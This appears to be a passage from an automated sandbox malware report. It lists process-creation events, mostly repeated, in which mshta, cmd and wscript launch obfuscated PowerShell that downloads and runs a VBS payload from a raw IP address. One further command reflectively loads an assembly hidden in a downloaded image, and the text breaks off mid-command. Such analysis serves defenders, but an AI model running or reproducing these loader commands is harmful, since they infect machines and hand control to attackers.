                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LF